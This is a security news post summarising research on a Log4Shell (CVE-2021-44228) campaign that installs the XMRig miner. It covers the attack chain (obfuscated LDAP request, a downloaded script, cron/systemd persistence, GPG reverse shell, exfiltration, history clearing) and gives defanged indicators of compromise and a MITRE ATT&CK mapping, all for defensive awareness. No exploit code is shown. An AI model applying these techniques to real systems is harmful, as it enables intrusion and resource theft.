New Log4j Campaign Exploits Vulnerability for Crypto-Mining and System Compromise
On August 20, 2024, DataDog Security Labs released a comprehensive threat research report detailing a new opportunistic campaign leveraging the notorious Log4j vulnerability, also known as Log4Shell.
Introduction
On August 20, 2024, DataDog Security Labs released a comprehensive threat research report detailing a new opportunistic campaign leveraging the notorious Log4j vulnerability, also known as Log4Shell. Despite being over two years old, this vulnerability continues to pose significant risks, as demonstrated by this latest attack aimed at crypto-mining and establishing persistent system control.
Report Overview
The Log4Shell vulnerability (CVE-2021-44228) was first discovered on November 24, 2021, by Security Researcher Chen Zhajun. This critical flaw in Apache Log4j, a widely used Java-based logging library, received the highest severity rating with a CVSS score of 10 out of 10. The vulnerability allows attackers to execute remote code, potentially compromising systems globally. Since its discovery, Log4Shell has been exploited by a range of threat actors, including nation-state groups like APT41 and cybercriminals such as the Conti ransomware gang.
On July 30, 2024, a honeypot deployed by DataDog Security Labs received an exploitation probe from a Tor exit node (185.220.101[.]34). The probe, initially appearing to be a standard Log4Shell attack, was later identified as part of a new campaign involving the deployment of the XMRig cryptocurrency miner.
The attack chain begins with an obfuscated LDAP request designed to evade detection. The request leads to the execution of a malicious Java class that downloads and runs a script named "lte." This script conducts system reconnaissance, retrieves system information, and establishes persistence through various means, depending on user privileges. The script also sets up multiple backdoors, including a reverse shell and encrypted communication channels, allowing remote control of the compromised system.
The script's execution flow includes downloading the XMRig miner, configuring it for crypto-mining, and ensuring its persistence by setting up system services or cron jobs. The script exfiltrates detailed system information to a remote server and attempts to evade detection by clearing command history and removing traces of its presence.
Insights and Analysis
The ongoing exploitation of Log4Shell in this campaign underscores the persistent threat posed by unpatched vulnerabilities. Organizations that have not yet applied mitigations for this vulnerability remain at risk of compromise, leading to potential data exfiltration, crypto-mining, and system control by malicious actors. The broader implications of this attack highlight the necessity for continuous monitoring and timely patching of known vulnerabilities.
The researchers at DataDog Security Labs emphasize the importance of not underestimating older vulnerabilities, as they continue to be exploited in new and evolving ways. This latest campaign serves as a reminder that opportunistic threat actors are constantly seeking unpatched systems to exploit for financial gain.
Organizations should prioritize the patching of the Log4Shell vulnerability if they haven't already done so. Additionally, implementing robust monitoring and detection capabilities is crucial to identifying and responding to such attacks promptly. Regularly reviewing and updating security controls, including those related to LDAP and JNDI, can further reduce the risk of exploitation.
The discovery of this new Log4j campaign by DataDog Security Labs illustrates the ongoing danger posed by unpatched vulnerabilities. The attack's sophisticated methods, including obfuscation, persistence mechanisms, and data exfiltration, highlight the need for vigilance in maintaining security hygiene. Organizations must act swiftly to mitigate these risks and protect their systems from similar threats.
Indicators of Compromise (IOC)
| Indicator | Type | Description |
|---|---|---|
| 185.220.101[.]34 | IP Address | Known Tor exit node used to probe for Log4Shell exploitation. |
| superr[.]buzz | Domain | Domain involved in the LDAP request for the attack. |
| cmpnst[.]info | Domain | Domain used for XMRig cryptocurrency mining configuration. |
| nfdo[.]shop | Domain | Domain used to host malicious scripts and exfiltrate data. |
| e4edfa8c6891f6815c05e73852212207cc454a42496d1a109e750c660368b5c1 | File Hash | Hash of the malicious script /tmp/lte. |
| 5441be217e98051c284d584e830f9a7fc2153143fafee0dc9f6af197cec6c8c9 | File Hash | Hash of the binary /bin/rcd. |
| 2ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f | File Hash | Hash of the cryptocurrency miner /bin/componist. |
| 4f11db82193aebe710585b2faefd2b904b6fe6636f7dc25541cea0dd31adada4 | File Hash | Hash of the binary /bin/nfdo. |
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Execution | Command and Scripting Interpreter | T1059 | The script uses curl, wget, and perl to download and execute malicious commands. |
| Persistence | Create or Modify System Process | T1543.003 | The script creates systemd services or cron jobs for persistence. |
| Defense Evasion | Clear Command History | T1070.003 | The script clears bash history to avoid detection. |
| Exfiltration | Exfiltration Over Web Service | T1567.002 | The script exfiltrates data via HTTP POST requests using curl. |
| Command and Control | Encrypted Channel | T1573 | The script sets up an encrypted reverse shell using GPG for communication. |
Reference
Comments ()